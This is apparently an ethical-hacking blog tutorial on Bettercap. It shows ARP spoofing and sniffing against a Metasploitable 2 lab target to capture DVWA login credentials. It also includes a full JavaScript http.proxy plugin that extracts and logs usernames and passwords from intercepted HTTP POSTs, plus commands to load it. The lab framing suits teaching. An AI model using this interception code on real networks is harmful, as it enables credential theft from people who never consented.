Hello, aspiring ethical hackers. In our previous blogpost, you learnt about the Man in The Middle (MiTM) attack. In this article, you will learn about Bettercap, a network reconnaissance and MiTM attack tool.
What is Bettercap?
Bettercap is a powerful, easily extensible and portable framework written in the Go programming language that is useful to security researchers, red teamers and reverse engineers for performing reconnaissance and MiTM attacks. It is known as the Swiss Army knife for 802.11, BLE, IPv4 and IPv6 network reconnaissance and MiTM attacks. Its features include:
- Performing WiFi network scanning, de-authentication attacks, clientless PMKID association attack and automatic WPA/WPA2/WPA3 client handshakes capture.
- Bluetooth Low Energy devices scanning, characteristics enumeration, reading and writing.
- 2.4GHz wireless devices scanning and MouseJacking attacks with over-the-air HID frames injection (with DuckyScript support).
- CAN-bus and DBC support for decoding, injecting and fuzzing frames.
- Passive and active IP network hosts probing and recon.
- ARP, DNS, NDP and DHCPv6 spoofers for MITM attacks on IPv4 and IPv6 based networks.
- Proxies at packet level, TCP level and HTTP/HTTPS application level fully scriptable with easy to implement javascript plugins.
- A powerful network sniffer for credentials harvesting which can also be used as a network protocol fuzzer.
- A very fast port scanner.
- A powerful REST API with support for asynchronous events notification on websocket to orchestrate your attacks easily.
- A very convenient web UI.
Let’s see how this tool works. We will be using Kali Linux as the attacker system, as bettercap is available in Kali Linux’s repositories and can be installed with the command shown below. As the target we will be using Metasploitable 2. Both systems are installed as part of our Simple hacking Lab.
sudo apt install bettercap
After installation, bettercap can be started as shown below. Note that it needs root privileges (raw socket access for sniffing and packet injection), so run it with sudo. If the lab network is not on your default interface, add -iface followed by the interface name.
sudo bettercap
Type “help” at the bettercap prompt to list the available commands and modules.
For this tutorial, let’s learn how to use modules in Bettercap. Bettercap’s functionality is split into modules. By default, only one module is running: “events.stream”, which prints every event bettercap generates (discovered hosts, captured packets, module status) to the console.
To learn about any module, use the command shown below. For example, let’s view the help details for the ‘net.probe’ module.
help <module name>
As you can see in the above image, this module detects new hosts on the network by sending dummy UDP packets to every address in the subnet, so that any live host shows up in the ARP table and gets added to the host list. To start a module in bettercap, the command is given below.
<module name> on
As soon as you turn it on, it starts probing the network for new machines. You can list all the active bettercap modules with the command “active”.
As you can see in the above image, three modules are now running: “events.stream” (running by default since we started bettercap), “net.probe”, and “net.recon”, which keeps track of the discovered hosts and was brought up alongside net.probe.
Now, let’s do something useful with this tool. In our previous blogpost on packet sniffing, you learnt how network packets can be captured. Let’s try the same with bettercap.
For this, we start the “net.sniff” module in bettercap.
We also start the ‘arp.spoof’ module. As you learnt in ARP spoofing, this is what puts us in the middle: the target’s traffic passes through our machine instead of going straight to the gateway.
For the novices, the “net.sniff” module performs packet sniffing, while the “arp.spoof” module performs an ARP poisoning attack against the target IP specified in its arp.spoof.targets parameter (that of Metasploitable 2).
Doing this captures all the network traffic going to or from our target system, i.e. Metasploitable 2. While bettercap does this, let’s log into the DVWA web app on Metasploitable 2 from our attacker system. (In a real attack the victim would be a third host; logging in from the attacker box just gives us traffic to look at.)
While we do this, bettercap captures the credentials, because DVWA on Metasploitable 2 is served over plain HTTP and the login form travels in clear text. Had the site used HTTPS, the sniffer would only see the TLS handshake; bettercap’s http.proxy module has an sslstrip option for that case, which is out of scope here.
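The net.sniff module’s built-in protocol parsers are what pull the DVWA username and password out of the captured POST. To make that mechanism concrete, here is an added example, not code from the original post or from the bettercap project: a bettercap http.proxy JavaScript plugin that does the same extraction on every proxied POST body. It assumes bettercap’s proxy script API (onRequest(req, res), req.Method, req.Hostname, req.Path, req.Client.IP, req.ReadBody() and log()); the filename creds.js, the field-name lists and the sample body are my own. Once arp.spoof is on, load it with the two commands in the header comment. Outside bettercap the same functions run under Node, since nothing bettercap-specific is needed except inside onRequest.

```javascript
// Added example, not from the original post or the bettercap project.
// A bettercap http.proxy plugin that pulls form credentials out of plaintext
// HTTP POST bodies, the same data net.sniff shows for the DVWA login.
// Assumed API (bettercap proxy scripts): onRequest(req, res), req.Method,
// req.Hostname, req.Path, req.Client.IP, req.ReadBody(), log().
// Load it at the bettercap prompt once arp.spoof is running (filename assumed):
//   set http.proxy.script creds.js
//   http.proxy on

// Field names commonly used by login forms; DVWA uses "username"/"password".
var USER_FIELDS = ["username", "user", "login", "email", "uname"];
var PASS_FIELDS = ["password", "pass", "passwd", "pwd"];

// Constructed sample: what the DVWA login POST body looks like on the wire.
var SAMPLE_BODY = "username=admin&password=password&Login=Login";

// Form bodies are application/x-www-form-urlencoded: '+' means space and
// %XX escapes must be decoded. Malformed escapes are left as-is.
function decodeField(s) {
  try {
    return decodeURIComponent(s.replace(/\+/g, " "));
  } catch (e) {
    return s;
  }
}

// Parse "a=1&b=2" into an object; keys are lower-cased for matching.
function parseForm(body) {
  var fields = {};
  var pairs = String(body || "").split("&");
  for (var i = 0; i < pairs.length; i++) {
    if (pairs[i] === "") { continue; }
    var eq = pairs[i].indexOf("=");
    var k = eq < 0 ? pairs[i] : pairs[i].substring(0, eq);
    var v = eq < 0 ? "" : pairs[i].substring(eq + 1);
    fields[decodeField(k).toLowerCase()] = decodeField(v);
  }
  return fields;
}

// Return the value of the first field name present, or null.
function firstMatch(fields, names) {
  for (var i = 0; i < names.length; i++) {
    if (Object.prototype.hasOwnProperty.call(fields, names[i])) {
      return fields[names[i]];
    }
  }
  return null;
}

// {user, pass} when the body carries a credential pair, otherwise null.
function extractCredentials(body) {
  var fields = parseForm(body);
  var user = firstMatch(fields, USER_FIELDS);
  var pass = firstMatch(fields, PASS_FIELDS);
  if (user === null || pass === null) { return null; }
  return { user: user, pass: pass };
}

// bettercap exposes log(); fall back to console.log when run outside it.
function emit(msg) {
  if (typeof log === "function") { log(msg); } else { console.log(msg); }
}

// Called by bettercap for every proxied request. Returns the credentials
// found (or null) so the logic can be exercised offline as well.
function onRequest(req, res) {
  if (req.Method !== "POST") { return null; }
  var creds = extractCredentials(req.ReadBody());
  if (creds === null) { return null; }
  emit("[creds] " + req.Client.IP + " -> " + req.Hostname + req.Path +
       "  user=" + creds.user + "  pass=" + creds.pass);
  return creds;
}
```

The plugin only ever sees cleartext HTTP: http.proxy transparently intercepts port 80 traffic of the spoofed targets, so an HTTPS login never reaches onRequest unless the proxy’s sslstrip option has downgraded it. The ES5 syntax (var, no arrow functions) is deliberate, since bettercap runs scripts in an ES5 interpreter.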
As you can see in the above images, both the username and password are clearly visible in the captured login request and were successfully retrieved by this tool. Next, learn about Wireshark, a network analyzer.